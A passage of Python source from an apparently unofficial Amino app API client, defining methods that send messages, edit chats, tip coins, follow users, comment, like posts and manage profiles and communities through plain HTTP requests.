if reason is None: raise exceptions.ReasonNeeded()
if flagType is None: raise exceptions.FlagTypeNeeded()
data = {
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["objectId"] = userId
data["objectType"] = 0
elif blogId:
data["objectId"] = blogId
data["objectType"] = 1
elif wikiId:
data["objectId"] = wikiId
data["objectType"] = 2
else: raise exceptions.SpecifyType
if asGuest: flg = "g-flag"
else: flg = "flag"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/{flg}", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def send_message(self, chatId: str, message: str = None, messageType: int = 0, file: BinaryIO = None, fileType: str = None, replyTo: str = None, mentionUserIds: list = None, stickerId: str = None, embedId: str = None, embedType: int = None, embedLink: str = None, embedTitle: str = None, embedContent: str = None, embedImage: BinaryIO = None):
"""
Send a Message to a Chat.
**Parameters**
- **message** : Message to be sent
- **chatId** : ID of the Chat.
- **file** : File to be sent.
- **fileType** : Type of the file.
- ``audio``, ``image``, ``gif``
- **messageType** : Type of the Message.
- **mentionUserIds** : List of User IDS to mention. '@' needed in the Message.
- **replyTo** : Message ID to reply to.
- **stickerId** : Sticker ID to be sent.
- **embedTitle** : Title of the Embed.
- **embedContent** : Content of the Embed.
- **embedLink** : Link of the Embed.
- **embedImage** : Image of the Embed.
- **embedId** : ID of the Embed.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is not None and file is None:
message = message.replace("<$", "").replace("$>", "")
mentions = []
if mentionUserIds:
for mention_uid in mentionUserIds:
mentions.append({"uid": mention_uid})
if embedImage:
embedImage = [[100, self.upload_media(embedImage, "image"), None]]
data = {
"type": messageType,
"content": message,
"clientRefId": int(timestamp() / 10 % 1000000000),
"attachedObject": {
"objectId": embedId,
"objectType": embedType,
"link": embedLink,
"title": embedTitle,
"content": embedContent,
"mediaList": embedImage
},
"extensions": {"mentionedArray": mentions},
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["replyMessageId"] = replyTo
if stickerId:
data["content"] = None
data["stickerId"] = stickerId
data["type"] = 3
if file:
data["content"] = None
if fileType == "audio":
data["type"] = 2
data["mediaType"] = 110
elif fileType == "image":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/jpg"
data["mediaUhqEnabled"] = True
elif fileType == "gif":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/gif"
data["mediaUhqEnabled"] = True
else: raise exceptions.SpecifyType
data["mediaUploadValue"] = base64.b64encode(file.read()).decode()
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/message", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
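    # Usage sketch (placeholder chat ID, message ID and file path): send a plain text
    # reply and then an image message to the same chat.
    #
    #   client.send_message(chatId="chat-id-placeholder", message="hi!",
    #                       replyTo="message-id-placeholder")
    #   with open("photo.jpg", "rb") as fp:
    #       client.send_message(chatId="chat-id-placeholder", file=fp, fileType="image")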
def delete_message(self, chatId: str, messageId: str, asStaff: bool = False, reason: str = None):
"""
Delete a Message from a Chat.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
- **asStaff** : If execute as a Staff member (Leader or Curator).
- **reason** : Reason of the action to show on the Moderation History.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"adminOpName": 102,
"adminOpNote": {"content": reason},
"timestamp": int(timestamp() * 1000)
}
data = json.dumps(data)
if not asStaff: response = self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}/admin", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def mark_as_read(self, chatId: str, messageId: str):
"""
Mark a Message from a Chat as Read.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"messageId": messageId,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/mark-as-read", headers=self.parse_headers(), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def edit_chat(self, chatId: str, doNotDisturb: bool = None, pinChat: bool = None, title: str = None, icon: str = None, backgroundImage: str = None, content: str = None, announcement: str = None, coHosts: list = None, keywords: list = None, pinAnnouncement: bool = None, publishToGlobal: bool = None, canTip: bool = None, viewOnly: bool = None, canInvite: bool = None, fansOnly: bool = None):
"""
        Edit a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **title** : Title of the Chat.
- **content** : Content of the Chat.
- **icon** : Icon of the Chat.
- **backgroundImage** : Url of the Background Image of the Chat.
- **announcement** : Announcement of the Chat.
            - **pinAnnouncement** : If the Chat Announcement should be Pinned or not.
- **coHosts** : List of User IDS to be Co-Host.
- **keywords** : List of Keywords of the Chat.
- **viewOnly** : If the Chat should be on View Only or not.
- **canTip** : If the Chat should be Tippable or not.
- **canInvite** : If the Chat should be Invitable or not.
- **fansOnly** : If the Chat should be Fans Only or not.
- **publishToGlobal** : If the Chat should show on Public Chats or not.
            - **doNotDisturb** : If Do Not Disturb should be enabled for the Chat or not.
            - **pinChat** : If the Chat should be Pinned or not.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if title: data["title"] = title
if content: data["content"] = content
if icon: data["icon"] = icon
if keywords: data["keywords"] = keywords
if announcement: data["extensions"]["announcement"] = announcement
if pinAnnouncement: data["extensions"]["pinAnnouncement"] = pinAnnouncement
if fansOnly: data["extensions"] = {"fansOnly": fansOnly}
if publishToGlobal: data["publishToGlobal"] = 0
if not publishToGlobal: data["publishToGlobal"] = 1
res = []
if doNotDisturb is not None:
if doNotDisturb:
data = json.dumps({"alertOption": 2, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not doNotDisturb:
data = json.dumps({"alertOption": 1, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if pinChat is not None:
if pinChat:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/pin", data=data, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not pinChat:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/unpin", data=data, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if backgroundImage is not None:
data = json.dumps({"media": [100, backgroundImage, None], "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/background", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if coHosts is not None:
data = json.dumps({"uidList": coHosts, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/co-host", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if viewOnly is not None:
if viewOnly:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not viewOnly:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if canInvite is not None:
if canInvite:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not canInvite:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if canTip is not None:
if canTip:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not canTip:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
return res
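    # Usage sketch (placeholder chat ID): rename a chat, mute it and pin it in one
    # call; the method returns a list with one status code per sub-request plus the
    # final thread update.
    #
    #   statuses = client.edit_chat(chatId="chat-id-placeholder", title="New title",
    #                               doNotDisturb=True, pinChat=True)
    #   print(statuses)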
def visit(self, userId: str):
"""
        Visit a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}?action=visit", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def send_coins(self, coins: int, blogId: str = None, chatId: str = None, objectId: str = None, transactionId: str = None):
url = None
if transactionId is None: transactionId = str(UUID(hexlify(urandom(16)).decode('ascii')))
data = {
"coins": coins,
"tippingContext": {"transactionId": transactionId},
"timestamp": int(timestamp() * 1000)
}
if blogId is not None: url = f"{self.api}/g/s/blog/{blogId}/tipping"
if chatId is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/tipping"
if objectId is not None:
data["objectId"] = objectId
data["objectType"] = 2
url = f"{self.api}/g/s/tipping"
if url is None: raise exceptions.SpecifyType()
data = json.dumps(data)
response = self.session.post(url, headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
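    # Usage sketch (placeholder blog ID): tip 10 coins to a blog post; a random
    # transactionId is generated when none is supplied.
    #
    #   client.send_coins(coins=10, blogId="blog-id-placeholder")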
def follow(self, userId: [str, list]):
"""
        Follow a User or Multiple Users.
**Parameters**
- **userId** : ID of the User or List of IDs of the Users.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str):
response = self.session.post(f"{self.api}/g/s/user-profile/{userId}/member", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif isinstance(userId, list):
data = json.dumps({"targetUidList": userId, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/joined", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unfollow(self, userId: str):
"""
        Unfollow a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/user-profile/{userId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def block(self, userId: str):
"""
Block a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unblock(self, userId: str):
"""
Unblock a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def join_community(self, comId: str, invitationId: str = None):
"""
Join a Community.
**Parameters**
- **comId** : ID of the Community.
- **invitationId** : ID of the Invitation Code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if invitationId: data["invitationId"] = invitationId
data = json.dumps(data)
response = self.session.post(f"{self.api}/x{comId}/s/community/join", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def request_join_community(self, comId: str, message: str = None):
"""
Request to join a Community.
**Parameters**
- **comId** : ID of the Community.
- **message** : Message to be sent.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"message": message, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/x{comId}/s/community/membership-request", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def leave_community(self, comId: str):
"""
Leave a Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/x{comId}/s/community/leave", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def flag_community(self, comId: str, reason: str, flagType: int, isGuest: bool = False):
"""
Flag a Community.
**Parameters**
- **comId** : ID of the Community.
- **reason** : Reason of the Flag.
- **flagType** : Type of Flag.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded
if flagType is None: raise exceptions.FlagTypeNeeded
data = json.dumps({
"objectId": comId,
"objectType": 16,
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
})
if isGuest: flg = "g-flag"
else: flg = "flag"
response = self.session.post(f"{self.api}/x{comId}/s/{flg}", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def edit_profile(self, nickname: str = None, content: str = None, icon: BinaryIO = None, backgroundColor: str = None, backgroundImage: str = None, defaultBubbleId: str = None):
"""
Edit account's Profile.
**Parameters**
- **nickname** : Nickname of the Profile.
- **content** : Biography of the Profile.
- **icon** : Icon of the Profile.
- **backgroundImage** : Url of the Background Picture of the Profile.
- **backgroundColor** : Hexadecimal Background Color of the Profile.
- **defaultBubbleId** : Chat bubble ID.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"address": None,
"latitude": 0,
"longitude": 0,
"mediaList": None,
"eventSource": "UserProfileView",
"timestamp": int(timestamp() * 1000)
}
if nickname: data["nickname"] = nickname
if icon: data["icon"] = self.upload_media(icon, "image")
if content: data["content"] = content
if backgroundColor: data["extensions"]["style"]["backgroundColor"] = backgroundColor
if backgroundImage: data["extensions"]["style"]["backgroundMediaList"] = [[100, backgroundImage, None, None, None]]
if defaultBubbleId: data["extensions"]["defaultBubbleId"] = defaultBubbleId
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
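# Usage sketch (hypothetical values; assumes an authenticated instance `client`):
#     client.edit_profile(nickname="New Name", content="New bio", backgroundColor="#333333")
# Only the fields that are passed are added to the request payload; colour values are hex
# strings and backgroundImage is expected to be an already-uploaded media URL.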
def set_privacy_status(self, isAnonymous: bool = False, getNotifications: bool = False):
"""
Edit account's Privacy Status.
**Parameters**
- **isAnonymous** : If visibility should be Anonymous or not.
- **getNotifications** : If account should get new Visitors Notifications.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if not isAnonymous: data["privacyMode"] = 1
if isAnonymous: data["privacyMode"] = 2
if not getNotifications: data["notificationStatus"] = 2
if getNotifications: data["privacyMode"] = 1
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/account/visit-settings", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def set_amino_id(self, aminoId: str):
"""
Edit account's Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"aminoId": aminoId, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/account/change-amino-id", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_linked_communities(self, userId: str):
"""
Get a List of Linked Communities of a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["linkedCommunityList"]).CommunityList
def get_unlinked_communities(self, userId: str):
"""
Get a List of Unlinked Communities of a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["unlinkedCommunityList"]).CommunityList
def reorder_linked_communities(self, comIds: list):
"""
Reorder List of Linked Communities.
**Parameters**
- **comIds** : IDs of the Communities.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"ndcIds": comIds, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/reorder", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def add_linked_community(self, comId: str):
"""
Add a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def remove_linked_community(self, comId: str):
"""
Remove a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def comment(self, message: str, userId: str = None, blogId: str = None, wikiId: str = None, replyTo: str = None):
"""
Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **message** : Message to be sent.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
- **replyTo** : ID of the Comment to Reply to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is None: raise exceptions.MessageNeeded
data = {
"content": message,
"stickerId": None,
"type": 0,
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["respondTo"] = replyTo
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/user-profile/{userId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/blog/{blogId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/item/{wikiId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
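# Usage sketch (hypothetical IDs; assumes an authenticated instance `client`):
#     client.comment("Nice post!", blogId="0000-blog-id")               # comment on a blog
#     client.comment("Hello!", userId="0000-user-id", replyTo="c-id")   # reply on a wall
# Exactly one of userId / blogId / wikiId must be supplied, otherwise SpecifyType is raised.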
def delete_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Delete a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: response = self.session.delete(f"{self.api}/g/s/user-profile/{userId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif blogId: response = self.session.delete(f"{self.api}/g/s/blog/{blogId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.delete(f"{self.api}/g/s/item/{wikiId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def like_blog(self, blogId: [str, list] = None, wikiId: str = None):
"""
Like a Blog, Multiple Blogs or a Wiki.
**Parameters**
- **blogId** : ID of the Blog or List of IDs of the Blogs. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if blogId:
if isinstance(blogId, str):
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/blog/{blogId}/g-vote?cv=1.2", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif isinstance(blogId, list):
data["targetIdList"] = blogId
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/feed/g-vote", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType(type(blogId))
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/item/{wikiId}/g-vote?cv=1.2", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType()
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unlike_blog(self, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Blog or Wiki.
**Parameters**
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if blogId: response = self.session.delete(f"{self.api}/g/s/blog/{blogId}/g-vote?eventSource=UserProfileView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.delete(f"{self.api}/g/s/item/{wikiId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def like_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Like a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unlike_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: response = self.session.delete(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?eventSource=UserProfileView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif blogId: response = self.session.delete(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.delete(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_membership_info(self):
"""
Get Information about your Amino+ Membership.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Membership Object <amino.lib.util.objects.Membership>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/membership?force=true", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Membership(json.loads(response.text)).Membership
def get_ta_announcements(self, language: str = "en", start: int = 0, size: int = 25):
"""
Get the list of Team Amino's Announcement Blogs.
**Parameters**
- **language** : Language of the Blogs.
- ``en``, ``es``, ``pt``, ``ar``, ``ru``, ``fr``, ``de``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Blogs List <amino.lib.util.objects.BlogList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if language not in self.get_supported_languages(): raise exceptions.UnsupportedLanguage(language)
